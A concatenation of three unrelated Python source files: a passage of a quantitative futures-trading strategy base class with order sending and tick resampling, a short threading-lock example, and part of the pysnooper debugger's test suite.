body {[type]} -- [description]
second ==> 2*second tick
b'{"ask_price_1": 4145.0, "ask_price_2": 0, "ask_price_3": 0, "ask_price_4": 0, "ask_price_5": 0,
"ask_volume_1": 69, "ask_volume_2": 0, "ask_volume_3": 0, "ask_volume_4": 0, "ask_volume_5": 0,
"average_price": 61958.14258714826,
"bid_price_1": 4143.0, "bid_price_2": 0, "bid_price_3": 0, "bid_price_4": 0, "bid_price_5": 0,
"bid_volume_1": 30, "bid_volume_2": 0, "bid_volume_3": 0, "bid_volume_4": 0, "bid_volume_5": 0,
"datetime": "2019-11-20 01:57:08", "exchange": "SHFE", "gateway_name": "ctp",
"high_price": 4152.0, "last_price": 4144.0, "last_volume": 0,
"limit_down": 3872.0, "limit_up": 4367.0, "local_symbol": "ag1912.SHFE",
"low_price": 4105.0, "name": "", "open_interest": 277912.0, "open_price": 4140.0,
"preSettlementPrice": 4120.0, "pre_close": 4155.0,
"symbol": "ag1912",
"volume": 114288}'
tick 会基于热数据的量 self._num_cached 来判断更新/重采样
"""
self.new_data = json.loads(str(body, encoding='utf-8'))
self._cached_data.append(self.new_data)
self.latest_price[self.new_data['symbol']
] = self.new_data['last_price']
# if len(self._cached_data) == self._num_cached:
# self.isupdate = True
if len(self._cached_data) > 3*self._num_cached:
# 控制缓存数据量
self._cached_data = self._cached_data[self._num_cached:]
data = pd.DataFrame(self._cached_data).loc[:, [
'datetime', 'last_price', 'volume']]
data = data.assign(datetime=pd.to_datetime(data.datetime)).set_index('datetime').resample(
self.frequence).apply({'last_price': 'ohlc', 'volume': 'last'}).dropna()
data.columns = data.columns.droplevel(0)
data = data.assign(volume=data.volume.diff(),
code=self.new_data['symbol'])
data = data.reset_index().set_index(['datetime', 'code'])
self.acc.on_price_change(
self.new_data['symbol'], self.latest_price[self.new_data['symbol']])
# .loc[:, ['open', 'high', 'low', 'close', 'volume', 'tradetime']]
now = datetime.datetime.now()
if now.hour == 20 and now.minute == 59 and now.second < 10:
self.daily_func()
time.sleep(10)
self.running_time = self.new_data['datetime']
# print(data.iloc[-1].index[0])
if self.dt != data.index[-1][0]:
self.isupdate = True
self.dt = data.index[-1][0]
self.upcoming_data(data.tail(1))
def tick_callback(self, a, b, c, body):
self.new_data = json.loads(str(body, encoding='utf-8'))
self.latest_price[self.new_data['symbol']
] = self.new_data['last_price']
self.running_time = self.new_data['datetime']
self.on_tick(self.new_data)
def get_code_marketdata(self, code):
return self.market_data.loc[(slice(None), code), :]
def get_current_marketdata(self):
return self.market_data.loc[(self.running_time, slice(None)), :]
def callback(self, a, b, c, body):
"""在strategy的callback中,我们需要的是
1. 更新数据
2. 更新bar
3. 更新策略状态
4. 推送事件
Arguments:
a {[type]} -- [description]
b {[type]} -- [description]
c {[type]} -- [description]
body {[type]} -- [description]
"""
self.new_data = json.loads(str(body, encoding='utf-8'))
self.latest_price[self.new_data['code']] = self.new_data['close']
if self.dt != str(self.new_data['datetime'])[0:16]:
# [0:16]是分钟线位数
self.dt = str(self.new_data['datetime'])[0:16]
self.isupdate = True
self.acc.on_price_change(self.new_data['code'], self.new_data['close'])
# .loc[:, ['open', 'high', 'low', 'close', 'volume', 'tradetime']]
bar = pd.DataFrame([self.new_data]).set_index(['datetime', 'code'])
now = datetime.datetime.now()
if now.hour == 20 and now.minute == 59 and now.second < 10:
self.daily_func()
time.sleep(10)
# res = self.job_control.find_one(
# {'strategy_id': self.strategy_id, 'strategy_id': self.strategy_id})
# self.control_status(res)
self.running_time = self.new_data['datetime']
self.upcoming_data(bar)
def control_status(self, res):
print(res)
def add_subscriber(self, qaproid):
"""Add a subscriber
增加订阅者的QAPRO_ID
"""
self.subscriber_client.insert_one(
{'strategy_id': self.strategy_id, 'user_id': qaproid})
@property
def subscriber_list(self):
"""订阅者
Returns:
[type] -- [description]
"""
return list(set([item['user_id'] for item in self.subscriber_client.find({'strategy_id': self.strategy_id})]))
def load_strategy(self):
raise NotImplementedError
def on_dailyopen(self):
pass
def on_dailyclose(self):
pass
def on_bar(self, bar):
raise NotImplementedError
def on_tick(self, tick):
raise NotImplementedError
def _on_1min_bar(self):
#raise NotImplementedError
if len(self._systemvar.keys()) > 0:
self._signal.append(copy.deepcopy(self._systemvar))
try:
self.on_1min_bar()
except:
pass
def on_deal(self, order):
"""
order is a dict type
"""
print('------this is on deal message ------')
print(order)
def on_1min_bar(self):
raise NotImplementedError
def on_5min_bar(self):
raise NotImplementedError
def on_15min_bar(self):
raise NotImplementedError
def on_30min_bar(self):
raise NotImplementedError
def order_handler(self):
self._orders = {}
def daily_func(self):
QA.QA_util_log_info('DAILY FUNC')
def risk_check(self):
pass
def plot(self, name, data, format):
""" plot是可以存储你的临时信息的接口, 后期会接入可视化
Arguments:
name {[type]} -- [description]
data {[type]} -- [description]
format {[type]} -- [description]
"""
self._systemvar[name] = {'datetime': copy.deepcopy(str(
self.running_time)), 'value': data, 'format': format}
def get_code(self):
if isinstance(self.code, str):
return self.code
else:
return self.code[0]
def check_order(self, direction, offset, code=None):
"""[summary]
同方向不开仓 只对期货市场做限制
buy - open
sell - close
"""
if code == None:
code = self.get_code()
if self.market_type == QA.MARKET_TYPE.FUTURE_CN:
if self.last_order_towards[code][direction] == str(offset):
return False
else:
return True
else:
return True
def on_ordererror(self, direction, offset, price, volume):
print('order Error ')
def receive_simpledeal(self,
code: str,
trade_time,
trade_amount,
direction,
offset,
trade_price,
message='sell_open'):
self.send_order(direction=direction, offset=offset,
volume=trade_amount, price=trade_price, order_id=QA.QA_util_random_with_topic(self.strategy_id))
def send_order(self, direction='BUY', offset='OPEN', price=3925, volume=10, order_id='', code=None):
if code == None:
code = self.get_code()
towards = eval('ORDER_DIRECTION.{}_{}'.format(direction, offset))
order_id = str(uuid.uuid4()) if order_id == '' else order_id
if isinstance(price, float):
pass
elif isinstance(price, pd.Series):
price = price.values[0]
if self.running_mode == 'sim':
# 在此处拦截无法下单的订单
if (direction == 'BUY' and self.latest_price[code] <= price) or (direction == 'SELL' and self.latest_price[code] >= price):
QA.QA_util_log_info(
'============ {} SEND ORDER =================='.format(order_id))
QA.QA_util_log_info('direction{} offset {} price{} volume{}'.format(
direction, offset, price, volume))
if self.check_order(direction, offset, code=code):
#self.last_order_towards = {'BUY': '', 'SELL': ''}
self.last_order_towards[code][direction] = offset
now = str(datetime.datetime.now())
order = self.acc.send_order(
code=code, towards=towards, price=price, amount=volume, order_id=order_id)
print(order)
order['topic'] = 'send_order'
self.pub.pub(
json.dumps(order), routing_key=self.strategy_id)
self.acc.make_deal(order)
self.on_deal(order)
self.bar_order['{}_{}'.format(
direction, offset)] = self.bar_id
if self.send_wx:
for user in self.subscriber_list:
QA.QA_util_log_info(self.subscriber_list)
try:
requests.post('http://www.yutiansut.com/signal?user_id={}&template={}&strategy_id={}&realaccount={}&code={}&order_direction={}&order_offset={}&price={}&volume={}&order_time={}'.format(
user, "xiadan_report", self.strategy_id, self.acc.user_id, code.lower(), direction, offset, price, volume, now))
except Exception as e:
QA.QA_util_log_info(e)
else:
QA.QA_util_log_info('failed in ORDER_CHECK')
else:
self.on_ordererror(direction, offset, price, volume)
elif self.running_mode == 'backtest':
self.bar_order['{}_{}'.format(direction, offset)] = self.bar_id
if self.market_type == 'stock_cn':
order = self.acc.send_order(
code=code, amount=volume, time=self.running_time, towards=towards, price=price)
order.trade(order.order_id, order.price,
order.amount, order.datetime)
self.on_deal(order.to_dict())
else:
self.acc.receive_simpledeal(
code=code, trade_time=self.running_time, trade_towards=towards, trade_amount=volume, trade_price=price, order_id=order_id, realorder_id=order_id, trade_id=order_id)
self.on_deal({
'code': code,
'trade_time': self.running_time,
'trade_towards': towards,
'trade_amount': volume,
'trade_price': price,
'order_id': order_id,
'realorder_id': order_id,
'trade_id': order_id
})
self.positions = self.acc.get_position(code)
def update_account(self):
if self.running_mode == 'sim':
QA.QA_util_log_info('{} UPDATE ACCOUNT'.format(
str(datetime.datetime.now())))
self.accounts = self.acc.account_msg
self.orders = self.acc.orders
if isinstance(self.code, str):
self.positions = self.acc.get_position(self.code)
else:
pass
self.trades = self.acc.trades
self.updatetime = self.acc.dtstr
self.on_sync()
elif self.running_mode == 'backtest':
if isinstance(self.code, str):
self.positions = self.acc.get_position(self.code)
else:
pass
def get_exchange(self, code):
return self.market_preset.get_exchange(code)
def get_positions(self, code):
if self.running_mode == 'sim':
self.update_account()
return self.acc.get_position(code)
elif self.running_mode == 'backtest':
return self.acc.get_position(code)
def get_cash(self):
if self.running_mode == 'sim':
self.update_account()
return self.accounts.get('available', '')
elif self.running_mode == 'backtest':
return self.acc.cash_available
def run(self):
while True:
time.sleep(self.risk_check_gap)
self.risk_check()
if __name__ == '__main__':
QAStrategyCTABase(code='rb2005').run()
|
lock_with.py
|
#!/usr/bin/env python3
# -*- coding:utf-8 -*-
# lock_with.py
#
# An example of using a lock with the Python 2.6 context-manager feature
import threading
X = 0 # A shared Value
COUNT = 1000000
# Primarily used to synchronize threads so that only one thread can make modifications to shared data at any given time.
X_Lock = threading.Lock() # A lock for synchronizing access to X
def addition():
global X
for i in range(COUNT):
with X_Lock: # This automatically acquires the lock and releases it when control enters/exits the associated block of statements
X += 1
def subtraction():
global X
for i in range(COUNT):
with X_Lock:
X -= 1
t1 = threading.Thread(target=subtraction)
t2 = threading.Thread(target=addition)
t1.start()
t2.start()
t1.join()
t2.join()
print(X)
"""
Only one thread can successfully acquire the lock at any given time
If another thread tries to acquire the lock when its already in use. it gets blocked until the lock is released.
"""
|
test_pysnooper.py
|
# Copyright 2019 Ram Rachum and collaborators.
# This program is distributed under the MIT license.
import io
import textwrap
import threading
import time
import types
import os
import sys
from pysnooper.utils import truncate
import pytest
import pysnooper
from pysnooper.variables import needs_parentheses
from .utils import (assert_output, assert_sample_output, VariableEntry,
CallEntry, LineEntry, ReturnEntry, OpcodeEntry,
ReturnValueEntry, ExceptionEntry, SourcePathEntry,
ElapsedTimeEntry)
from . import mini_toolbox
def test_string_io():
string_io = io.StringIO()
@pysnooper.snoop(string_io)
def my_function(foo):
x = 7
y = 8
return y + x
result = my_function('baba')
assert result == 15
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('foo', value_regex="u?'baba'"),
CallEntry('def my_function(foo):'),
LineEntry('x = 7'),
VariableEntry('x', '7'),
LineEntry('y = 8'),
VariableEntry('y', '8'),
LineEntry('return y + x'),
ReturnEntry('return y + x'),
ReturnValueEntry('15'),
ElapsedTimeEntry(),
)
)
def test_relative_time():
snoop = pysnooper.snoop(relative_time=True)
def foo(x):
if x == 0:
bar1(x)
qux()
return
with snoop:
# There should be line entries for these three lines,
# no line entries for anything else in this function,
# but calls to all bar functions should be traced
foo(x - 1)
bar2(x)
qux()
int(4)
bar3(9)
return x
@snoop
def bar1(_x):
qux()
@snoop
def bar2(_x):
qux()
@snoop
def bar3(_x):
qux()
def qux():
time.sleep(0.1)
return 9 # not traced, mustn't show up
with mini_toolbox.OutputCapturer(stdout=False,
stderr=True) as output_capturer:
result = foo(2)
assert result == 2
output = output_capturer.string_io.getvalue()
assert_output(
output,
(
# In first with
SourcePathEntry(),
VariableEntry('x', '2'),
VariableEntry('bar1'),
VariableEntry('bar2'),
VariableEntry('bar3'),
VariableEntry('foo'),
VariableEntry('qux'),
VariableEntry('snoop'),
LineEntry('foo(x - 1)'),
# In with in recursive call
VariableEntry('x', '1'),
VariableEntry('bar1'),
VariableEntry('bar2'),
VariableEntry('bar3'),
VariableEntry('foo'),
VariableEntry('qux'),
VariableEntry('snoop'),
LineEntry('foo(x - 1)'),
# Call to bar1 from if block outside with
VariableEntry('_x', '0'),
VariableEntry('qux'),
CallEntry('def bar1(_x):'),
LineEntry('qux()'),
ReturnEntry('qux()'),
ReturnValueEntry('None'),
ElapsedTimeEntry(0.1),
# In with in recursive call
LineEntry('bar2(x)'),
# Call to bar2 from within with
VariableEntry('_x', '1'),
VariableEntry('qux'),
CallEntry('def bar2(_x):'),
LineEntry('qux()'),
ReturnEntry('qux()'),
ReturnValueEntry('None'),
ElapsedTimeEntry(0.1),
# In with in recursive call
LineEntry('qux()'),
ElapsedTimeEntry(0.4),
# Call to bar3 from after with
VariableEntry('_x', '9'),
VariableEntry('qux'),
CallEntry('def bar3(_x):'),
LineEntry('qux()'),
ReturnEntry('qux()'),
ReturnValueEntry('None'),
ElapsedTimeEntry(0.1),
# -- Similar to previous few sections,
# -- but from first call to foo
# In with in first call
LineEntry('bar2(x)'),
# Call to bar2 from within with
VariableEntry('_x', '2'),
VariableEntry('qux'),
CallEntry('def bar2(_x):'),
LineEntry('qux()'),
ReturnEntry('qux()'),
ReturnValueEntry('None'),
ElapsedTimeEntry(0.1),
# In with in first call
LineEntry('qux()'),
ElapsedTimeEntry(0.7),
# Call to bar3 from after with
VariableEntry('_x', '9'),
VariableEntry('qux'),
CallEntry('def bar3(_x):'),
LineEntry('qux()'),
ReturnEntry('qux()'),
ReturnValueEntry('None'),
ElapsedTimeEntry(0.1),
),
)
def test_thread_info():
@pysnooper.snoop(thread_info=True)
def my_function(foo):
x = 7
y = 8
return y + x
with mini_toolbox.OutputCapturer(stdout=False,
stderr=True) as output_capturer:
result = my_function('baba')
assert result == 15
output = output_capturer.string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('foo', value_regex="u?'baba'"),
CallEntry('def my_function(foo):'),
LineEntry('x = 7'),
VariableEntry('x', '7'),
LineEntry('y = 8'),
VariableEntry('y', '8'),
LineEntry('return y + x'),
ReturnEntry('return y + x'),
ReturnValueEntry('15'),
ElapsedTimeEntry(),
)
)
def test_multi_thread_info():
@pysnooper.snoop(thread_info=True)
def my_function(foo):
x = 7
y = 8
return y + x
def parse_call_content(line):
return line.split('{event:9} '.format(event='call'))[-1]
with mini_toolbox.OutputCapturer(stdout=False,
stderr=True) as output_capturer:
my_function('baba')
t1 = threading.Thread(target=my_function, name="test123",args=['bubu'])
t1.start()
t1.join()
t1 = threading.Thread(target=my_function, name="bibi",args=['bibi'])
t1.start()
t1.join()
output = output_capturer.string_io.getvalue()
calls = [line for line in output.split("\n") if "call" in line]
main_thread = calls[0]
assert parse_call_content(main_thread) == parse_call_content(calls[1])
assert parse_call_content(main_thread) == parse_call_content(calls[2])
thread_info_regex = '([0-9]+-{name}+[ ]+)'
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('foo', value_regex="u?'baba'"),
CallEntry('def my_function(foo):',
thread_info_regex=thread_info_regex.format(
name="MainThread")),
LineEntry('x = 7',
thread_info_regex=thread_info_regex.format(
name="MainThread")),
VariableEntry('x', '7'),
LineEntry('y = 8',
thread_info_regex=thread_info_regex.format(
name="MainThread")),
VariableEntry('y', '8'),
LineEntry('return y + x',
thread_info_regex=thread_info_regex.format(
name="MainThread")),
ReturnEntry('return y + x'),
ReturnValueEntry('15'),
ElapsedTimeEntry(),
VariableEntry('foo', value_regex="u?'bubu'"),
CallEntry('def my_function(foo):',
thread_info_regex=thread_info_regex.format(
name="test123")),
LineEntry('x = 7',
thread_info_regex=thread_info_regex.format(
name="test123")),
VariableEntry('x', '7'),
LineEntry('y = 8',
thread_info_regex=thread_info_regex.format(
name="test123")),
VariableEntry('y', '8'),
LineEntry('return y + x',
thread_info_regex=thread_info_regex.format(
name="test123")),
ReturnEntry('return y + x'),
ReturnValueEntry('15'),
ElapsedTimeEntry(),
VariableEntry('foo', value_regex="u?'bibi'"),
CallEntry('def my_function(foo):',
thread_info_regex=thread_info_regex.format(name='bibi')),
LineEntry('x = 7',
thread_info_regex=thread_info_regex.format(name='bibi')),
VariableEntry('x', '7'),
LineEntry('y = 8',
thread_info_regex=thread_info_regex.format(name='bibi')),
VariableEntry('y', '8'),
LineEntry('return y + x',
thread_info_regex=thread_info_regex.format(name='bibi')),
ReturnEntry('return y + x'),
ReturnValueEntry('15'),
ElapsedTimeEntry(),
)
)
@pytest.mark.parametrize("normalize", (True, False))
def test_callable(normalize):
string_io = io.StringIO()
def write(msg):
string_io.write(msg)
@pysnooper.snoop(write, normalize=normalize)
def my_function(foo):
x = 7
y = 8
return y + x
result = my_function('baba')
assert result == 15
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('foo', value_regex="u?'baba'"),
CallEntry('def my_function(foo):'),
LineEntry('x = 7'),
VariableEntry('x', '7'),
LineEntry('y = 8'),
VariableEntry('y', '8'),
LineEntry('return y + x'),
ReturnEntry('return y + x'),
ReturnValueEntry('15'),
ElapsedTimeEntry(),
),
normalize=normalize,
)
@pytest.mark.parametrize("normalize", (True, False))
def test_watch(normalize):
class Foo(object):
def __init__(self):
self.x = 2
def square(self):
self.x **= 2
@pysnooper.snoop(watch=(
'foo.x',
'io.__name__',
'len(foo.__dict__["x"] * "abc")',
), normalize=normalize)
def my_function():
foo = Foo()
for i in range(2):
foo.square()
with mini_toolbox.OutputCapturer(stdout=False,
stderr=True) as output_capturer:
result = my_function()
assert result is None
output = output_capturer.string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('Foo'),
VariableEntry('io.__name__', "'io'"),
CallEntry('def my_function():'),
LineEntry('foo = Foo()'),
VariableEntry('foo'),
VariableEntry('foo.x', '2'),
VariableEntry('len(foo.__dict__["x"] * "abc")', '6'),
LineEntry(),
VariableEntry('i', '0'),
LineEntry(),
VariableEntry('foo.x', '4'),
VariableEntry('len(foo.__dict__["x"] * "abc")', '12'),
LineEntry(),
VariableEntry('i', '1'),
LineEntry(),
VariableEntry('foo.x', '16'),
VariableEntry('len(foo.__dict__["x"] * "abc")', '48'),
LineEntry(),
ReturnEntry(),
ReturnValueEntry('None'),
ElapsedTimeEntry(),
),
normalize=normalize,
)
@pytest.mark.parametrize("normalize", (True, False))
def test_watch_explode(normalize):
class Foo:
def __init__(self, x, y):
self.x = x
self.y = y
@pysnooper.snoop(watch_explode=('_d', '_point', 'lst + []'), normalize=normalize)
def my_function():
_d = {'a': 1, 'b': 2, 'c': 'ignore'}
_point = Foo(x=3, y=4)
lst = [7, 8, 9]
lst.append(10)
with mini_toolbox.OutputCapturer(stdout=False,
stderr=True) as output_capturer:
result = my_function()
assert result is None
output = output_capturer.string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('Foo'),
CallEntry('def my_function():'),
LineEntry(),
VariableEntry('_d'),
VariableEntry("_d['a']", '1'),
VariableEntry("_d['b']", '2'),
VariableEntry("_d['c']", "'ignore'"),
LineEntry(),
VariableEntry('_point'),
VariableEntry('_point.x', '3'),
VariableEntry('_point.y', '4'),
LineEntry(),
VariableEntry('lst'),
VariableEntry('(lst + [])[0]', '7'),
VariableEntry('(lst + [])[1]', '8'),
VariableEntry('(lst + [])[2]', '9'),
VariableEntry('lst + []'),
LineEntry(),
VariableEntry('lst'),
VariableEntry('(lst + [])[3]', '10'),
VariableEntry('lst + []'),
ReturnEntry(),
ReturnValueEntry('None'),
ElapsedTimeEntry(),
),
normalize=normalize,
)
@pytest.mark.parametrize("normalize", (True, False))
def test_variables_classes(normalize):
class WithSlots(object):
__slots__ = ('x', 'y')
def __init__(self):
self.x = 3
self.y = 4
@pysnooper.snoop(watch=(
pysnooper.Keys('_d', exclude='c'),
pysnooper.Attrs('_d'), # doesn't have attributes
pysnooper.Attrs('_s'),
pysnooper.Indices('_lst')[-3:],
), normalize=normalize)
def my_function():
_d = {'a': 1, 'b': 2, 'c': 'ignore'}
_s = WithSlots()
_lst = list(range(1000))
with mini_toolbox.OutputCapturer(stdout=False,
stderr=True) as output_capturer:
result = my_function()
assert result is None
output = output_capturer.string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('WithSlots'),
CallEntry('def my_function():'),
LineEntry(),
VariableEntry('_d'),
VariableEntry("_d['a']", '1'),
VariableEntry("_d['b']", '2'),
LineEntry(),
VariableEntry('_s'),
VariableEntry('_s.x', '3'),
VariableEntry('_s.y', '4'),
LineEntry(),
VariableEntry('_lst'),
VariableEntry('_lst[997]', '997'),
VariableEntry('_lst[998]', '998'),
VariableEntry('_lst[999]', '999'),
ReturnEntry(),
ReturnValueEntry('None'),
ElapsedTimeEntry(),
),
normalize=normalize,
)
@pytest.mark.parametrize("normalize", (True, False))
def test_single_watch_no_comma(normalize):
class Foo(object):
def __init__(self):
self.x = 2
def square(self):
self.x **= 2
@pysnooper.snoop(watch='foo', normalize=normalize)
def my_function():
foo = Foo()
for i in range(2):
foo.square()
with mini_toolbox.OutputCapturer(stdout=False,
stderr=True) as output_capturer:
result = my_function()
assert result is None
output = output_capturer.string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('Foo'),
CallEntry('def my_function():'),
LineEntry('foo = Foo()'),
VariableEntry('foo'),
LineEntry(),
VariableEntry('i', '0'),
LineEntry(),
LineEntry(),
VariableEntry('i', '1'),
LineEntry(),
LineEntry(),
ReturnEntry(),
ReturnValueEntry('None'),
ElapsedTimeEntry(),
),
normalize=normalize,
)
@pytest.mark.parametrize("normalize", (True, False))
def test_long_variable(normalize):
@pysnooper.snoop(normalize=normalize)
def my_function():
foo = list(range(1000))
return foo
with mini_toolbox.OutputCapturer(stdout=False,
stderr=True) as output_capturer:
result = my_function()
assert result == list(range(1000))
output = output_capturer.string_io.getvalue()
regex = r'^(?=.{100}$)\[0, 1, 2, .*\.\.\..*, 997, 998, 999\]$'
assert_output(
output,
(
SourcePathEntry(),
CallEntry('def my_function():'),
LineEntry('foo = list(range(1000))'),
VariableEntry('foo', value_regex=regex),
LineEntry(),
ReturnEntry(),
ReturnValueEntry(value_regex=regex),
ElapsedTimeEntry(),
),
normalize=normalize,
)
@pytest.mark.parametrize("normalize", (True, False))
def test_long_variable_with_custom_max_variable_length(normalize):
@pysnooper.snoop(max_variable_length=200, normalize=normalize)
def my_function():
foo = list(range(1000))
return foo
with mini_toolbox.OutputCapturer(stdout=False,
stderr=True) as output_capturer:
result = my_function()
assert result == list(range(1000))
output = output_capturer.string_io.getvalue()
regex = r'^(?=.{200}$)\[0, 1, 2, .*\.\.\..*, 997, 998, 999\]$'
assert_output(
output,
(
SourcePathEntry(),
CallEntry('def my_function():'),
LineEntry('foo = list(range(1000))'),
VariableEntry('foo', value_regex=regex),
LineEntry(),
ReturnEntry(),
ReturnValueEntry(value_regex=regex),
ElapsedTimeEntry(),
),
normalize=normalize,
)
@pytest.mark.parametrize("normalize", (True, False))
def test_long_variable_with_infinite_max_variable_length(normalize):
@pysnooper.snoop(max_variable_length=None, normalize=normalize)
def my_function():
foo = list(range(1000))
return foo
with mini_toolbox.OutputCapturer(stdout=False,
stderr=True) as output_capturer:
result = my_function()
assert result == list(range(1000))
output = output_capturer.string_io.getvalue()
regex = r'^(?=.{1000,100000}$)\[0, 1, 2, [^.]+ 997, 998, 999\]$'
assert_output(
output,
(
SourcePathEntry(),
CallEntry('def my_function():'),
LineEntry('foo = list(range(1000))'),
VariableEntry('foo', value_regex=regex),
LineEntry(),
ReturnEntry(),
ReturnValueEntry(value_regex=regex),
ElapsedTimeEntry(),
),
normalize=normalize,
)
@pytest.mark.parametrize("normalize", (True, False))
def test_repr_exception(normalize):
class Bad(object):
def __repr__(self):
1 / 0
@pysnooper.snoop(normalize=normalize)
def my_function():
bad = Bad()
with mini_toolbox.OutputCapturer(stdout=False,
stderr=True) as output_capturer:
result = my_function()
assert result is None
output = output_capturer.string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('Bad'),
CallEntry('def my_function():'),
LineEntry('bad = Bad()'),
VariableEntry('bad', value='REPR FAILED'),
ReturnEntry(),
ReturnValueEntry('None'),
ElapsedTimeEntry(),
),
normalize=normalize,
)
@pytest.mark.parametrize("normalize", (True, False))
def test_depth(normalize):
string_io = io.StringIO()
def f4(x4):
result4 = x4 * 2
return result4
def f3(x3):
result3 = f4(x3)
return result3
def f2(x2):
result2 = f3(x2)
return result2
@pysnooper.snoop(string_io, depth=3, normalize=normalize)
def f1(x1):
result1 = f2(x1)
return result1
result = f1(10)
assert result == 20
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry(),
VariableEntry(),
CallEntry('def f1(x1):'),
LineEntry(),
VariableEntry(),
VariableEntry(),
CallEntry('def f2(x2):'),
LineEntry(),
VariableEntry(),
VariableEntry(),
CallEntry('def f3(x3):'),
LineEntry(),
VariableEntry(),
LineEntry(),
ReturnEntry(),
ReturnValueEntry('20'),
VariableEntry(),
LineEntry(),
ReturnEntry(),
ReturnValueEntry('20'),
VariableEntry(),
LineEntry(),
ReturnEntry(),
ReturnValueEntry('20'),
ElapsedTimeEntry(),
),
normalize=normalize,
)
@pytest.mark.parametrize("normalize", (True, False))
def test_method_and_prefix(normalize):
class Baz(object):
def __init__(self):
self.x = 2
@pysnooper.snoop(watch=('self.x',), prefix='ZZZ', normalize=normalize)
def square(self):
foo = 7
self.x **= 2
return self
baz = Baz()
with mini_toolbox.OutputCapturer(stdout=False,
stderr=True) as output_capturer:
result = baz.square()
assert result is baz
assert result.x == 4
output = output_capturer.string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(prefix='ZZZ'),
VariableEntry('self', prefix='ZZZ'),
VariableEntry('self.x', '2', prefix='ZZZ'),
CallEntry('def square(self):', prefix='ZZZ'),
LineEntry('foo = 7', prefix='ZZZ'),
VariableEntry('foo', '7', prefix='ZZZ'),
LineEntry('self.x **= 2', prefix='ZZZ'),
VariableEntry('self.x', '4', prefix='ZZZ'),
LineEntry(prefix='ZZZ'),
ReturnEntry(prefix='ZZZ'),
ReturnValueEntry(prefix='ZZZ'),
ElapsedTimeEntry(prefix='ZZZ'),
),
prefix='ZZZ',
normalize=normalize,
)
@pytest.mark.parametrize("normalize", (True, False))
def test_file_output(normalize):
with mini_toolbox.create_temp_folder(prefix='pysnooper') as folder:
path = folder / 'foo.log'
@pysnooper.snoop(path, normalize=normalize)
def my_function(_foo):
x = 7
y = 8
return y + x
result = my_function('baba')
assert result == 15
with path.open() as output_file:
output = output_file.read()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('_foo', value_regex="u?'baba'"),
CallEntry('def my_function(_foo):'),
LineEntry('x = 7'),
VariableEntry('x', '7'),
LineEntry('y = 8'),
VariableEntry('y', '8'),
LineEntry('return y + x'),
ReturnEntry('return y + x'),
ReturnValueEntry('15'),
ElapsedTimeEntry(),
),
normalize=normalize,
)
@pytest.mark.parametrize("normalize", (True, False))
def test_confusing_decorator_lines(normalize):
string_io = io.StringIO()
def empty_decorator(function):
return function
@empty_decorator
@pysnooper.snoop(string_io, normalize=normalize,
depth=2) # Multi-line decorator for extra confusion!
@empty_decorator
@empty_decorator
def my_function(foo):
x = lambda bar: 7
y = 8
return y + x(foo)
result = my_function('baba')
assert result == 15
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('foo', value_regex="u?'baba'"),
CallEntry('def my_function(foo):'),
LineEntry(),
VariableEntry(),
LineEntry(),
VariableEntry(),
LineEntry(),
# inside lambda
VariableEntry('bar', value_regex="u?'baba'"),
CallEntry('x = lambda bar: 7'),
LineEntry(),
ReturnEntry(),
ReturnValueEntry('7'),
# back in my_function
ReturnEntry(),
ReturnValueEntry('15'),
ElapsedTimeEntry(),
),
normalize=normalize,
)
@pytest.mark.parametrize("normalize", (True, False))
def test_lambda(normalize):
string_io = io.StringIO()
my_function = pysnooper.snoop(string_io, normalize=normalize)(lambda x: x ** 2)
result = my_function(7)
assert result == 49
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('x', '7'),
CallEntry(source_regex='^my_function = pysnooper.*'),
LineEntry(source_regex='^my_function = pysnooper.*'),
ReturnEntry(source_regex='^my_function = pysnooper.*'),
ReturnValueEntry('49'),
ElapsedTimeEntry(),
),
normalize=normalize,
)
def test_unavailable_source():
with mini_toolbox.create_temp_folder(prefix='pysnooper') as folder, \
mini_toolbox.TempSysPathAdder(str(folder)):
module_name = 'iaerojajsijf'
python_file_path = folder / ('%s.py' % (module_name,))
content = textwrap.dedent(u'''
import pysnooper
@pysnooper.snoop()
def f(x):
return x
''')
with python_file_path.open('w') as python_file:
python_file.write(content)
module = __import__(module_name)
python_file_path.unlink()
with mini_toolbox.OutputCapturer(stdout=False,
stderr=True) as output_capturer:
result = getattr(module, 'f')(7)
assert result == 7
output = output_capturer.output
assert_output(
output,
(
SourcePathEntry(),
VariableEntry(stage='starting'),
CallEntry('SOURCE IS UNAVAILABLE'),
LineEntry('SOURCE IS UNAVAILABLE'),
ReturnEntry('SOURCE IS UNAVAILABLE'),
ReturnValueEntry('7'),
ElapsedTimeEntry(),
)
)
def test_no_overwrite_by_default():
with mini_toolbox.create_temp_folder(prefix='pysnooper') as folder:
path = folder / 'foo.log'
with path.open('w') as output_file:
output_file.write(u'lala')
@pysnooper.snoop(str(path))
def my_function(foo):
x = 7
y = 8
return y + x
result = my_function('baba')
assert result == 15
with path.open() as output_file:
output = output_file.read()
assert output.startswith('lala')
shortened_output = output[4:]
assert_output(
shortened_output,
(
SourcePathEntry(),
VariableEntry('foo', value_regex="u?'baba'"),
CallEntry('def my_function(foo):'),
LineEntry('x = 7'),
VariableEntry('x', '7'),
LineEntry('y = 8'),
VariableEntry('y', '8'),
LineEntry('return y + x'),
ReturnEntry('return y + x'),
ReturnValueEntry('15'),
ElapsedTimeEntry(),
)
)
def test_overwrite():
with mini_toolbox.create_temp_folder(prefix='pysnooper') as folder:
path = folder / 'foo.log'
with path.open('w') as output_file:
output_file.write(u'lala')
@pysnooper.snoop(str(path), overwrite=True)
def my_function(foo):
x = 7
y = 8
return y + x
result = my_function('baba')
result = my_function('baba')
assert result == 15
with path.open() as output_file:
output = output_file.read()
assert 'lala' not in output
assert_output(
output,
(
SourcePathEntry(),
